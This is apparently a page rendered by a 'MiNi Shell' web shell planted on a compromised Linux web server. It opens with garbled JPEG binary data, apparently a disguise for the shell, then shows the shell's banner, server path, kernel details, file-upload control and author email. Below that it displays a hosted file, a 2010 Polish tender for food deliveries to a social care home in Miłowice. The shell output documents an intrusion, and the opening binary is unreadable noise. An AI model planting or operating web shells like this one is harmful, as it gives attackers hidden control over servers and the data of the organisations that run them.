JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100119/12211-N-2010.html

<p class="kh_header"><b>Żary: Dostawa artykułów żywnościowych  do Domu Pomocy społecznej w Miłowicach  z podzialem na zadania</b><br>
<b>Numer ogłoszenia: 12211 - 2010; data zamieszczenia: 19.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Miłowicach , Miłowice 26, 68-200 Żary, woj. lubuskie, tel. 0-68 374-38-22, faks 0-68 374-38-22.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: pomoc spoleczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych  do Domu Pomocy społecznej w Miłowicach  z podzialem na zadania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie1. Dostawa mięsa, wyrobów mięsnych, wędlin i drobiu 

Lp.	Nazwa towaru	Nr wg CPV	Jedn.
miary	Ilość
( w skali roku)
1.	Antrykot z/k	151	Kg	200
2.	Boczek surowy	151	Kg	140
3.	Karkówka z kością	151	Kg	400
4.	Karkówka bez kości	151	Kg	100
5	Łopatka bez kości	151	Kg	640
6.	Mielonka klopsowa 	151	Kg	160
7.	Schab	151	Kg	35
8.	Wątróbka wieprzowa	151	Kg	135
9.	Filet z piersi kurczaka	151	Kg	160
10.	Kurczaki	151	Kg	1200
11.	Udka z kurczaka	151	Kg	280
12.	Wątróbka drobiowa	151	Kg	230
13.	Żołądki drobiowe	151	Kg	20
14.	Kaszanka	151	Kg	50
15.	Pasztetowa drobiowa	151	Kg	45
16.	Salceson włoski	151	Kg	70
17.	Boczek faszerowany	151	Kg	70
18.	Baleron	151	Kg	10
19.	Kiełbasa śląska	151	Kg	420
20.	Kiełbasa zwyczajna	151	Kg	100
21.	Kiełbasa biała parzona	151	Kg	35
22.	Metka łososiowa	151	Kg	80
23.	Mielonka kanapkowa	151	Kg	104
24.	Mortadela drobiowa	151	Kg	120
25.	Ogonówka	151	Kg	110
26.	Polędwica drobiowa	151	Kg	100
27.	Parówki drobiowe	151	Kg	80
28.
29.
30.
31.	Rolada drobiowa
Szynka gotowana
Schab
Szynka  wiejska	151
151
151
151	Kg
kg
kg
kg	15
40
20
30


Zadanie 2. Dostawa warzyw i owoców mrożonych

1.	Brokuły mrożone	153	Kg	250
2.	Brukselka mrożona	153	Kg	150
3.	Fasolka szparag. mrożona	153	Kg	60
4.	Kalafior mrożony	153	Kg	240
5.	Mieszanka kompotowa	153	Kg	350
6.	Marchewka z groszkiem	153	Kg	200
				

Zadanie 3. Dostawa dżemów, marmolady, warzyw i owoców przetworzonych

1.	Ćwikła z chrzanem	153	szt	59
2.	Dżemy owocowe 7 kg	153	kg	15
3.	Dżemy owocowe 12 kg	153	Kg	24
4.	Dżemy owocowe 525 g	153	Szt.	214
5.	Fasolka szparag. Konserwowa 500 g	153	szt	347
6.	Groszek konserwowy 400 g	153	szt	395
7.	Jabłka prażone	153	Szt.	62
8.	Koncentrat pomidorowy o,9 l	153	szt	81
9.	Kukurydza kons. 2,5 kg	153	Szt.	7
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.	Kukurydza konserwowa 400 g
Marmolada
Miód
Miód wielokwiatowy 1,4 l
Ogórki konserwowe 0,9 l
Ogórki konserwowe 1.700 ml
Przecier ogórkowy 350 g
Papryka konserwowa 1,7 
Papryka konserwowa 500 g
Sałatka szwedzka 0,9 l
Sałatka wielowarzywna 0,9 l	153
153
153
153
153
153
153
153
153
153
153	Szt.
Kg
L
szt
szt
szt
szt
op
szt
szt
szt	62
84
19
28
550
105
211
3
154
242
397


Zadanie 4. Dostawa mleka i artykułów nabiałowych pochodzenia roślinnego

Lp.	Nazwa towaru	Nr wg CPV	Jedn.
miary	Ilość
( w skali roku)
1.	Jogurty naturalne 400 g	155	Szt	380
2.	Jogurty owocowe 150 g	155	Szt	600
3.	Margaryna zwykła	155	kg	600
4.	Masło extra 200g	155	Kg	880
5.	Mleko w folii 2%	155	Litr	8700
6.	Margaryna do smarowania	155	Kg	92
7.	Mleko w proszku 500 g	155	Kg	12
8.	Olej	155	L	620
9.	Ser topiony	155	Kg	116
10.	Śmietana 18 %	155	L	886
11.	Ser żółty	155	Kg	310
12.	Serek kanapkowy 	154	szt	970
13.	Serek wiejski 200 g	154	Szt	750
14.
	Twaróg półtłusty
	154
	Kg
	450




Zadanie 5. Dostawa pieczywa

Lp.	Nazwa towaru	Nr wg CPV	Jedn.
miary	Ilość
( w skali roku)
1.	Chleb zwykły krojony Baltonowski	158	Szt	2800
2.	Chleb pszenny krojony	158	Szt	550
3.	Chleb wieloziarnisty krojony	158	Szt	2900
4.	Bułki zwykłe duże	158	Szt	3271
5.	Bułka tarta	158	Kg	134
6.

7.	Ciasta różne (sernik, orzechowiec, biszkopt)
Pączki	158

158	Kg

szt	100

100


Zadanie 6. Dostawa artykułów mącznych, przypraw i dodatków suchych

Lp.	Nazwa towaru	Nr wg CPV	Jedn.
miary	Ilość
( w skali roku)
1.	Koperek suszony	156	szt	30
2.	Maga w płynie	156	L	45
3.	Majeranek 150 g	156	szt	40
4.	Przyprawa gyros 500 g	156	szt	67
5.	Przyprawa do ryb 	156	szt	50
6.	Papryka mielona czerwona	156	op.	14
7.	Pieprz mielony 500 g	156	szt	20
8.	Warzywko	156	kg	142
9.	Ziele angielskie 600 g	156	op.	1
10.	Barszcz biały	158	kg	11
12.	Cukierki mieszanka 	158	kg	20 
13. 	Cukier waniliowy	158	Szt	65
14.	Cukier puder	158	Kg	7
15.	Czosnek granulowany	158	szt	30
16.	Cukier kryształ	158	Kg	850
17.	Ciastka kruche	158	kg	30
18.	Galaretki owocowe	158	Szt	13
19.	Herbata 100 g	158	Szt	1450
20.	Kawa Inka 150 g	158	szt	292
21.	Kakao 100 g	158	szt	250
22.	Kisiele owocowe	158	szt	910
23.	Ketchup	158	Op.	125
24.	Konserwy mięsne 300 g	158	szt	526
25.	Kasza manna	158	Kg	154




Zadanie 7. Dostawa ryb i przetworów rybnych

Lp.	Nazwa towaru	Nr wg CPV	Jedn.
miary	Ilość
( w skali roku)
1.	Ryba mrożona Panga	152	Kg	250
2.	Ryba mrożona Mintaj	152	Kg	250
3.	Tuńczyk w sosie własnym 1.700g	152	Op.	280
4.	Paprykarz szczeciński 300g	152	Szt	40
5.	Szproty w pomidorach lub w oleju 300g	152	Szt	700
6.	Filety śledziowe Matjas	152	Kg	30
7.	Ryba wędzona  Makrela	152	Kg	120


Zadanie 8. Dostawa jaj

Lp.	Nazwa towaru	Nr wg CPV	Jedn.
miary	Ilość
( w skali roku)
1.	Jajka średnie	124	Szt.	19.600.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> bez wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> spełnia-nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Do udokumentowania spełnienia wymaganych warunków oferta musi zawierać następujące dokumenty lub poświadczone za zgodność z oryginałem (przez upełnomocnionego przedstawiciela wykonawcy) ich odpisy lub kserokopie:
a/ formularz oferty wraz z wypełnionym załącznikiem do oferty, 
b/ podpisany na każdej stronie wzór umowy
c/ podpisane oświadczenie oferenta o spełnieniu warunków udziału w postępowaniu
d/ aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert ( w przypadku wspólnego ubiegania się o udzielenia zamówienia dotyczy wszystkich wykonawców.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.dps.powiatzarski.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Miłowicach, Miłowice 26 68-200 Żary.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.01.2010 godzina 10:00, miejsce: Dom Pomocy Społecznej w Miłowicach, Miłowice 26 - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com